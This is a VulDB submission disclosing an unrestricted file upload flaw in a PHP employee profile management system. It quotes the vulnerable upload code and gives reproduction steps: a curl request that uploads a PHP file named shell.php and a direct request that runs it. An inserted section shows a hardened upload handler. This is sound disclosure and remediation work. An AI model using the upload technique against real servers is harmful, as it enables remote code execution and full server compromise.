Submission #699247: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload - information

Title: code-projects Employee Profile Management System published November 15, 2025 Unrestricted Upload
Description:

Summary
The vulnerability exists in the file upload component (Profiling/add_file_query.php) due to missing validation of uploaded file types and content. The application allows arbitrary files, including executable .php files, to be uploaded into a web-accessible directory.

Root Cause
The server stores uploaded files directly under Profiling/uploads/ using the original filename from the client:

    $target_dir = "uploads/";
    $target_file = $target_dir . basename($_FILES["per_file"]["name"]);
    move_uploaded_file($_FILES["per_file"]["tmp_name"], $target_file);

There is no extension restriction, no MIME checking, no content inspection, no filename randomization, and the upload directory is inside the web root. Therefore, a user can upload a PHP file that the server later executes.

Reproduction
1. Log in as a normal user who has access to the "Add File" feature.
2. Upload the following file as shell.php:

    <?php echo "EXECUTED: " . __FILE__; ?>

3. Send the upload request (example using curl):

    curl -X POST "http://localhost/Profiling/add_file_query.php" \
      -F "per_name=1" \
      -F "per_file=@shell.php" \
      -F "upload=Save"

4. Access the uploaded file directly: http://localhost/Profiling/uploads/shell.php

The PHP code executes and prints the message, confirming arbitrary code execution.

Impact
This allows remote attackers to upload and execute arbitrary PHP code on the server. Successful exploitation leads to full server compromise, including command execution, data theft, privilege escalation, and persistent backdoor installation.
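For contrast with the three lines quoted under Root Cause, the following is a hardened upload handler written for this note as an added example; it is not code from the project. It assumes the form field is still "per_file", that the feature is meant for documents and images only, and that a separate download script serves files from a directory outside the web root.

```php
<?php
// Hardened replacement for the upload logic quoted in the Root Cause section.
// Added example, not the project's own code. Assumptions: the form field is
// still "per_file", uploads are meant to be documents/images, and the returned
// name is saved to the database and served later by a download script.
declare(strict_types=1);

// Allow-list: extension => MIME types its bytes may carry.
const ALLOWED = [
    'pdf'  => ['application/pdf'],
    'png'  => ['image/png'],
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
];
const MAX_BYTES = 5 * 1024 * 1024;
// Outside the web root, so nothing stored here can be requested or executed by the web server.
const STORE_DIR = __DIR__ . '/../private_uploads';

function store_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected upload');
    }
    // The client-supplied name is used only to select an allow-list entry.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the real content type from the bytes; $file['type'] is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-chosen random name: the original filename never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = STORE_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // not executable, not world-readable
    return $name;
}

if (isset($_FILES['per_file'])) {
    echo store_upload($_FILES['per_file']);
}
```

Each of the five gaps listed in the Root Cause paragraph (extension, MIME, content, filename, web-root location) maps to one check above; the storage directory should additionally have script execution disabled in the web server configuration as defence in depth.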
Source: https://github.com/shenxianyuguitian/employee-management-UFU
User: xuanyuesanshi (UID 88126)
Submitted: 21/11/2025 08:26 (5 months ago)
Moderated: 06/12/2025 18:22 (15 days later)
Status: accepted
VulDB Entry: 334615 [code-projects Employee Profile Management System 1.0 add_file_query.php per_file privilege escalation]
Points: 20
